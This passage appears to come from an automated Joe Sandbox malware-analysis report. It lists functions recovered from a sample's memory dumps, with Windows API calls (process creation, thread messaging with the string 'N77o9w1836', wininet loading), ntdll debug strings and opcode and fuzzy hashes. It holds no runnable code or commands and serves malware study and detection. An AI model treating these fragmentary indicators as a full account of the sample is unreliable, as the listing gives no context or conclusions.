                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: ec01fe05991e302145302ed7ead0cf3122278e6f61c3d3bba40d3070605388aa
                                                      • Instruction ID: 5cf4cde82e7ea9dfa0e25d0edfc8f641d3680d1a630037b4afa148d75a245966
                                                      • Opcode Fuzzy Hash: ec01fe05991e302145302ed7ead0cf3122278e6f61c3d3bba40d3070605388aa
                                                      • Instruction Fuzzy Hash: 2201FE31A4125876DB1157955C02FEFBB7CDF81711F104197FA04AB340D674AD118BE5
                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 02DD0E1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                      • Instruction ID: 31c8bd1e5f523bb8ac6470d792ff26e864727209ece178ae294d20c8c178fd2b
                                                      • Opcode Fuzzy Hash: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                      • Instruction Fuzzy Hash: 97F0BB76E4126875DB2156914C02FAF7B79CF81B61F148095EA047B3C1D6B4AD028BE5
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 02DE2F6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 0d8d0c8d6b3e62e8ab3d2cf77feb1b48f401ffe38d204fcf7f8acb982b3220f8
                                                      • Instruction ID: 3f5ea9a8a2f33f3ef3036511595f783575ad4e0fe227709db4c6be69315bd49b
                                                      • Opcode Fuzzy Hash: 0d8d0c8d6b3e62e8ab3d2cf77feb1b48f401ffe38d204fcf7f8acb982b3220f8
                                                      • Instruction Fuzzy Hash: E4318FB1601705BBDB18EF65C884FE7BBB9EB48704F50861DB95A5B380D770BA40CBA1
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 02DDEF47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 7b00c411e6af0d7a88f787b213f0a7b71209d49bc76fa7b8b9e00b1bf606f269
                                                      • Instruction ID: cc14cb566157deda78087a7fb999bb11535b19b317bea1d6961cae0408ef912a
                                                      • Opcode Fuzzy Hash: 7b00c411e6af0d7a88f787b213f0a7b71209d49bc76fa7b8b9e00b1bf606f269
                                                      • Instruction Fuzzy Hash: 5F313FB5A0060A9FDB10DFD8D8809EEB7B9FF88304F108559E916AB354D771AE45CBA0
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 02DDEF47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 44e872770270470269c676d3ba4feb8682c40bf83486e244650d60c79dd493d9
                                                      • Instruction ID: 0d11977854e779dc2b4d94222ecc009836464f332fc8c2f9d2beb14028bd3b94
                                                      • Opcode Fuzzy Hash: 44e872770270470269c676d3ba4feb8682c40bf83486e244650d60c79dd493d9
                                                      • Instruction Fuzzy Hash: 2C311EB5A0060A9FDB00DFD8D8809EFB7B9FF88304F108559E906AB354D775AE45CBA0
                                                      APIs
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02DDC28F
                                                      • FindClose.KERNELBASE(?), ref: 02DDC29A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$CloseFileNext
                                                      • String ID:
                                                      • API String ID: 2066263336-0
                                                      • Opcode ID: c0055070deae22915e5ede0b486bd1d9294e1c65bd6a09feaad89b7eebcc2598
                                                      • Instruction ID: 188dced462d3b081744057d72e05d1ac97fb268f1fdca9657665e98f2ef8774f
                                                      • Opcode Fuzzy Hash: c0055070deae22915e5ede0b486bd1d9294e1c65bd6a09feaad89b7eebcc2598
                                                      • Instruction Fuzzy Hash: D1D0123675401D9F4B108DF5AC84BED7B74FA94F62F1081AAE809D7140E731C901D6D0
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02DD47E2
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                      • Instruction ID: 444fc5283c81e26ec5b87d0e31d49c6203006f1c38015083e78ef6dec0f24c4a
                                                      • Opcode Fuzzy Hash: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                      • Instruction Fuzzy Hash: EA011EB9E0020EBBDF10EAE4DC41F9EB3B9AB44708F0041A5E90997240F671EB14CBA1
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,02DD8053,00000010,?,?,?,00000044,?,00000010,02DD8053,?,?,?), ref: 02DE8713
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                      • Instruction ID: 9d2a1a080e089a8e3acccc136e4aca56a6a528bc28aba2bc7459b0a8f8be8613
                                                      • Opcode Fuzzy Hash: fe320d940116e532e60eba5034f8ffaffc46bd86db19e5629ddddabe4e23124c
                                                      • Instruction Fuzzy Hash: 8901C0B2205109BBCB54DE99DC80EEB77AEEF8C754F508208BA09E3240D630FC518BA4
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02DC96D5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: b31c6847052ecd92f4524369f8bc20af02225ef8099cb7ae7682019b181a62e3
                                                      • Instruction ID: b2a7a593240e6af6e11d18d41489c44916ee10735c9f106b5ff8262240c78c1c
                                                      • Opcode Fuzzy Hash: b31c6847052ecd92f4524369f8bc20af02225ef8099cb7ae7682019b181a62e3
                                                      • Instruction Fuzzy Hash: F6F030333842143AE62076A99C02FD7725CDB80765F24042AF70DDB2C0D995F84146A4
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45589,00000007,00000000,00000004,00000000,02DD4043,000000F4,?,?,?,?,?), ref: 02DE865C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                      • Instruction ID: 5abf5c1c0fad3c5af322ddf5b9ecb7e165b69492e9ac497ed02881e5631eb62f
                                                      • Opcode Fuzzy Hash: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                      • Instruction Fuzzy Hash: 48E032B62042047BDA10EA99DC40EDB33ADEBC8710F004409F909A7281C631B8118AB4
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(02DD19B9,?,02DE4DCB,02DD19B9,02DE49C7,02DE4DCB,?,02DD19B9,02DE49C7,00001000,?,?,02DE9EA0), ref: 02DE860C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                      • Instruction ID: 06245885e901cf5fb016b721809a9010c4c55f08627e48556e04be775b79be2d
                                                      • Opcode Fuzzy Hash: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                      • Instruction Fuzzy Hash: 8AE0E5B22042197BDA14EE99EC41EDB77ADEFC9720F508419F90AA7281D670BD10CBB5
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02DD80BC
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 41e75460d2c76cdf25b9bf2df3f084cf74ce42965de9562ae070f3b99972df46
                                                      • Instruction ID: 5d11cfdabc15a6fb46963ed7c210606a3bbc40e3edd94b659c699f38202b7fee
                                                      • Opcode Fuzzy Hash: 41e75460d2c76cdf25b9bf2df3f084cf74ce42965de9562ae070f3b99972df46
                                                      • Instruction Fuzzy Hash: 97E0D83120020416FA2469A8DC45B7633589744624F544B50B91CCB3C1E679FD429250
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02DD1CA0,02DE70E7,02DE49C7,?), ref: 02DD7ED3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2dc0000_compact.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 6e269ccc2046a89e5352fbc42c4229eefa4882b668fd737a69486c942e2259ec
                                                      • Instruction ID: a6c7cfa8ccb2b85ae873d1aaa24d76309a10eff2bf6446de8d34c96cc85ea72e
                                                      • Opcode Fuzzy Hash: 6e269ccc2046a89e5352fbc42c4229eefa4882b668fd737a69486c942e2259ec
                                                      • Instruction Fuzzy Hash: F4D05E716443053BFA40A6F58C06F57328D8B50764F558468B90DEB3C2EDA5F9108AB5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: be62c70b500c126e3b322d0b3b530adc5636310c5ea39eb0d5b2a04b59ad8415
                                                      • Instruction ID: d4b1494c3f50edf8072899d94d9abdb1f3e9df3ab97d22ced179fe52e7155aa8
                                                      • Opcode Fuzzy Hash: be62c70b500c126e3b322d0b3b530adc5636310c5ea39eb0d5b2a04b59ad8415
                                                      • Instruction Fuzzy Hash: A6B09B71A015C5D6EB15E7604608717794467D0701F19C471F2030651F4779D1D1E576
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4563280908.0000000003A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_3a20000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aac5dcc0867217ba4aba7e9cd7e431ab872d74c33f9427044c7fa6ef03974de3
                                                      • Instruction ID: 48e812853c5b051c3e34909679dca6e46ee0d18e67f2cd9631a98c8c06b3622e
                                                      • Opcode Fuzzy Hash: aac5dcc0867217ba4aba7e9cd7e431ab872d74c33f9427044c7fa6ef03974de3
                                                      • Instruction Fuzzy Hash: A041257161DB1D4FD368EF6C90816BBB7E2FB85300F50052ED98AC3752EA74E8428785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4563280908.0000000003A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_3a20000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3558027158
                                                      • Opcode ID: acaf5d12afa628f009e63383bb23d224d841069a9dc0630c6d547ed248772fab
                                                      • Instruction ID: e7890e37c54eda3a6be995a4e86932085cd04d53d517547bce13a75aa61cfbaa
                                                      • Opcode Fuzzy Hash: acaf5d12afa628f009e63383bb23d224d841069a9dc0630c6d547ed248772fab
                                                      • Instruction Fuzzy Hash: 339141F04482948AC7158F59A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 2d988a4122ad5a1f79dab55f1a9830327c38736b71cd42f9f40d94c2f1eb4c01
                                                      • Instruction ID: 3cfcbc61a5092a5061299ad42e5af1abe4648fd013409eb0323813a0772941db
                                                      • Opcode Fuzzy Hash: 2d988a4122ad5a1f79dab55f1a9830327c38736b71cd42f9f40d94c2f1eb4c01
                                                      • Instruction Fuzzy Hash: 6451D7B6A00216BFDF10DF98C89097EFBBCBB092407148669F469D7642D774EE509BA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 488527d5aa3aa8d7db95bc61385635a95122c7816eac9cf46290519538d67574
                                                      • Instruction ID: 802380a077914b1a36587bf9d0e7c8b5937f8e12580434b08a1b277c021c6144
                                                      • Opcode Fuzzy Hash: 488527d5aa3aa8d7db95bc61385635a95122c7816eac9cf46290519538d67574
                                                      • Instruction Fuzzy Hash: 9C51D6B5A01645AECB34DE5CC890ABFB7FDEF44200B148899E5E6D7642D7B4DE40C760
                                                      Strings
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03774725
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03774787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03774742
                                                      • ExecuteOptions, xrefs: 037746A0
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03774655
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037746FC
                                                      • Execute=1, xrefs: 03774713
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 3b62a98989d0d907a4d198d24afef5a26bc157d6bae6f40a39be8806940ea592
                                                      • Instruction ID: 04a9ff06ff8a2a1c5793948e317b86817c701f4cda470196da8ed430400268af
                                                      • Opcode Fuzzy Hash: 3b62a98989d0d907a4d198d24afef5a26bc157d6bae6f40a39be8806940ea592
                                                      • Instruction Fuzzy Hash: 3F512AB5640359BADF14EBA5DC99FED73A8EF06300F0400EDD505AB192E770AA45DF50
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: 01a5826be151c8bc2144f3f087fedb44f950e76931f691397088229e5c73c324
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: E302F375508341AFC709CF18C894A6BFBF5EFC8704F548A2DB9899B264DB31E905CB52
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 3f8fbbd55e85fa27a831091f002389ec21afd592f7f1bd3c19e20003f1a33fa0
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: DC81AD70E052499ADF29CF68C9917FEBBA6AF45320F1C415ED8E1A7391C734EC409B51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 1c4084aee85bcc63801d48062acb966f51fec427eb62f6fd28e975cadd14a0d7
                                                      • Instruction ID: 7e4054932785abf193da214f593b26b042ed00c7730d6349d84886607eb757ca
                                                      • Opcode Fuzzy Hash: 1c4084aee85bcc63801d48062acb966f51fec427eb62f6fd28e975cadd14a0d7
                                                      • Instruction Fuzzy Hash: 0C216276A0121DAFCB10DF79CC44AEEB7F9EF44640F180516E915E7201E730E9028BA1
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037702BD
                                                      • RTL: Re-Waiting, xrefs: 0377031E
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037702E7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 9fe12a2174d5f7e66f82e023f57bd54075d6b6d749934eca6f55a6a10d5ab21c
                                                      • Instruction ID: 30000e33aa2f82ec29c49bebbbdd4461ffd6308f6f060a564275c09c96b500fc
                                                      • Opcode Fuzzy Hash: 9fe12a2174d5f7e66f82e023f57bd54075d6b6d749934eca6f55a6a10d5ab21c
                                                      • Instruction Fuzzy Hash: 6EE18B356047419FDB25CF28C884B2ABBF0FB89724F184A6DF5A58B2E1D774E944CB42
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 03777BAC
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03777B7F
                                                      • RTL: Resource at %p, xrefs: 03777B8E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: 9dabd905ba843b3e75537bdf2c04cac37fc76e7f7f502059f776ffa502a68ee1
                                                      • Instruction ID: 030df9900ebdf4ee8b395b76b796fdaeba6030f37e0e4c1645ec7cda0418fa32
                                                      • Opcode Fuzzy Hash: 9dabd905ba843b3e75537bdf2c04cac37fc76e7f7f502059f776ffa502a68ee1
                                                      • Instruction Fuzzy Hash: 1E4101353017439FCB24DE29C844B6AB7E5EF8A720F040A2DF95ADB691DB31E8058F91
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0377728C
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 037772C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03777294
                                                      • RTL: Resource at %p, xrefs: 037772A3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 70344431fa0c18487141569d55450b7739dc1f1309d67d0edf55742f3f48bfa8
                                                      • Instruction ID: bf7dc0e4a47cd25d7336d38096261c0d2e7ac62ed2752679004f524eca12c467
                                                      • Opcode Fuzzy Hash: 70344431fa0c18487141569d55450b7739dc1f1309d67d0edf55742f3f48bfa8
                                                      • Instruction Fuzzy Hash: EF41FD36700342ABCB24DE24CC41F6AB7B5FF85720F140A19F965AB241DB20F812DBD1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
